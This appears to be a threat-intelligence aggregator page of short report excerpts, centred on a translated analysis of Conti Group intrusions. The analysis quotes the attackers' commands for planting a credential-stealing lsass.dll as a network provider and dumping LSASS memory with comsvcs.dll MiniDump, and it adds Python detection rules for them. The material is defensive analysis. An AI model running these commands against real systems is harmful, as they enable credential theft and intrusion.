Executive Summary

Ransom Cartel is ransomware as a service (RaaS) that surfaced in mid-December 2021. This ransomware performs double extortion attacks and exhibits several similarities and technical overlaps with REvil ransomware. REvil ransomware disappeared just a couple of months before Ransom Cartel surfaced and just one month after 14 of its alleged members were arrested in Russia.…

Executive Summary

The cyber mercenary group known as Void Balaur continues to expand its hack-for-hire campaigns into 2022, unfazed by disruptions to its online advertising personas. New targets include a wide variety of industries, often with particular business or political interests tied to Russia. Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks.…
Executive Summary

NullMixer is a dropper leading to an infection chain of a wide variety of malware families. NullMixer spreads via malicious websites that are found mainly via search engines. These websites are often related to cracks, keygens and activators for downloading software illegally, and while they may pretend to be legitimate software, they actually contain a malware dropper.…

Executive Summary

Cybercriminals compromise domain names to attack the owners or users of the domains directly, or use them for various nefarious endeavors, including phishing, malware distribution, and command and control (C2) operations. A special case of DNS hijacking is called domain shadowing, where attackers stealthily create malicious subdomains under compromised domain names.…

Broadcom Software has gained insight into the current activities of a group we call Webworm. The group has developed customized versions of three older remote access Trojans (RATs): Trochilus, Gh0st RAT, and 9002 RAT. At least one of the indicators of compromise (IOCs) observed by Symantec was used in an attack against an IT service provider operating in multiple Asian countries, while others appear to be in pre-deployment or testing stages.…

Cisco Talos recently identified a new, ongoing campaign attributed to the Russia-linked Gamaredon APT that infects Ukrainian users with information-stealing malware. The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine. LNK files, PowerShell and VBScript enable initial access, while malicious binaries are deployed in the post-infection phase.…
Key Takeaways

In mid-2022, TA453 deployed a social engineering impersonation technique informally called Multi-Persona Impersonation, in which the threat actor uses at least two actor-controlled personas on a single email thread to convince targets of the legitimacy of the campaign. This is an intriguing technique because it requires more resources per target (potentially burning more personas) and a coordinated approach among the various personalities in use by TA453.…
It has now been six months since the war in Ukraine began. Since then, pro-Russian and pro-Ukrainian hacker groups such as KillNet, Anonymous, IT Army of Ukraine and Legion Spetsnaz RF have carried out cyberattacks. A lesser-known group called NoName057(16) is among the pro-Russian groups attacking Ukraine and the neighbouring countries that side with it.…

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality.…

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued to rise throughout the war in Ukraine, but the types of attacks have also been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many targets as they can to see what gets a result.…

The QiAnXin Threat Intelligence Center has been closely tracking Russian-speaking threat actors and active underground forums. Over the past six months we have observed the globally known Conti Group using Exchange vulnerabilities to launch targeted attacks against venture capital firms, luxury goods companies, chip manufacturers and foreign-invested joint-venture manufacturers. The targeted companies all share one trait: they are "wealthy".

Conti Group is one of the most active ransomware gangs today. According to a report published last year by the foreign vendor cyberint [1], Conti Group carried out 600 successful attacks in 2021, earning a total of 2.7 billion USD. After Conti Group's leadership declared in February 2022 that it sided with Russia in the Russia-Ukraine war, its internal data was leaked publicly on Twitter.

After analysing the leaked information, cyberint found that Conti Group had more than 400 members, with a division of labour as fine-grained as that of a small technology company.

The US magazine Wired reported [2] that the leaked chat logs indicate Conti Group had ad hoc cooperation with APT29.

Besides Conti Group, we have also observed other Russian-speaking threat actors who brute-force mainstream databases or exploit N-day vulnerabilities to implant CobaltStrike or the AnyDesk remote control software and then, once the time is ripe, deploy GlobeImposter or Leakthemall ransomware; we have named them BruteSql Group. In the first half of the year we published "Back from the dead! Analysis of new REvil ransomware attacks in the wild" [3], which covered REvil ransomware's latest attack activity, but in the months since we have not seen similar attacks, the dark-web page has not been updated, and the gang has gone dormant.

As with our previous articles, this article only shares the attack techniques Conti Group has used over the past six months. At the end we share the IOCs the group has used historically, for peers to use in tracking and attribution.

Conti Group

Conti Group uses an Exchange vulnerability to establish a tunnel connection to the target machine, then drops a credential-stealing backdoor named lsass.dll into the windows\system32 directory. The command lines executed are as follows:

cmd.exe /c !uplaod D:\Uchebka\work\SOFT\LSASS\lsass.dll -dest C:\Windows\system32\lsass.dll

reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider" /v "ProviderPath" /t "REG_EXPAND_SZ" /d "C:\Windows\system32\lsass.dll"

cmd.exe /c dir c:\windows\temp\tmpQWER.tmp

rundll32 C:\Windows\Sysnative\comsvcs.dll, MiniDump 668 c:\windows\temp\tmpQWER.dmp full

The attackers' working path is visible in the command line; on lookup, Uchebka is a surname from Eastern Europe.
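As an added defensive example (not from the original article), the following Python checks constructed process-creation records for the three behaviours visible in the command lines above: a file named lsass.dll dropped into System32, a Network Provider registered with a ProviderPath DLL outside a known baseline, and rundll32 calling the MiniDump export of comsvcs.dll. The known-provider baseline and the event field names (Image, CommandLine) are assumptions.

```python
"""Detection logic for the Conti tradecraft quoted above (added example, not from the article).

Constructed EDR-style process-creation records are checked for three behaviours:
  * rundll32 loading comsvcs.dll with its MiniDump export (LSASS memory dump);
  * a Network Provider registered under Services\\<svc>\\NetworkProvider whose
    ProviderPath DLL is not in the known-provider baseline;
  * a file named lsass.dll written into System32 (Windows ships lsass.exe, no lsass.dll).
"""
import re

# Assumed baseline of legitimate network provider DLLs; tune per environment.
KNOWN_PROVIDERS = {"ntlanman.dll", "drprov.dll", "davclnt.dll", "vmhgfs.dll"}

RE_MINIDUMP = re.compile(r"comsvcs\.dll\s*,?\s*minidump", re.I)
RE_NETPROV = re.compile(
    r"HKLM\\SYSTEM\\CurrentControlSet\\Services\\(?P<svc>[^\\\"]+)\\NetworkProvider.*?"
    r"/v\s*\"?ProviderPath\"?.*?/d\s*\"?(?P<path>[^\"\s]+)", re.I)
RE_LSASS_DLL = re.compile(r"(?:-dest|copy|>)\s*\"?[a-z]:\\windows\\system32\\lsass\.dll", re.I)

def classify(cmdline: str) -> list:
    """Return the names of the detections that fire on a single command line."""
    hits = []
    if RE_MINIDUMP.search(cmdline):
        hits.append("lsass_dump_comsvcs")
    m = RE_NETPROV.search(cmdline)
    if m and m.group("path").rsplit("\\", 1)[-1].lower() not in KNOWN_PROVIDERS:
        hits.append("rogue_network_provider:" + m.group("svc"))
    if RE_LSASS_DLL.search(cmdline):
        hits.append("lsass_dll_dropped_to_system32")
    return hits

def scan(events: list) -> list:
    """Classify every event's CommandLine; return (Image, detection) pairs in event order."""
    return [(ev.get("Image", "?"), hit)
            for ev in events for hit in classify(ev.get("CommandLine", ""))]

# Constructed sample events modelled on the command lines quoted in the article,
# plus one benign provider registration that must not fire.
SAMPLE_EVENTS = [
    {"Image": "cmd.exe", "CommandLine": r"cmd.exe /c !uplaod D:\Uchebka\work\SOFT\LSASS\lsass.dll -dest C:\Windows\system32\lsass.dll"},
    {"Image": "reg.exe", "CommandLine": r'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\logincontroll\NetworkProvider" /v "ProviderPath" /t "REG_EXPAND_SZ" /d "C:\Windows\system32\lsass.dll"'},
    {"Image": "cmd.exe", "CommandLine": r"cmd.exe /c dir c:\windows\temp\tmpQWER.tmp"},
    {"Image": "rundll32.exe", "CommandLine": r"rundll32 C:\Windows\Sysnative\comsvcs.dll, MiniDump 668 c:\windows\temp\tmpQWER.dmp full"},
    {"Image": "reg.exe", "CommandLine": r'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider" /v ProviderPath /t REG_EXPAND_SZ /d "%SystemRoot%\System32\ntlanman.dll"'},
]

if __name__ == "__main__":
    for image, detection in scan(SAMPLE_EVENTS):
        print(f"{image:14} {detection}")
```

The benign LanmanWorkstation registration and the plain dir command produce no findings, which is the baseline the three rules are tuned against.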

On July 7, 2022, CISA published an alert entitled "North Korean State-Sponsored Cyber Actors Use Maui Ransomware To Target the Healthcare and Public Health Sector," related to a Stairwell report, "Maui Ransomware." Later, the Department of Justice announced that it had effectively clawed back $500,000 in ransom payments to the group, partly thanks to new legislation.…

In April 2022, PT Expert Security Center detected an attack on a number of Russian media and energy companies that used a malicious document called «list.docx» to extract a malicious payload packed with VMProtect. Having analyzed the network packet, we found it to be identical to the one we studied in our report on APT31 tools, suggesting that these may belong to one and the same group.…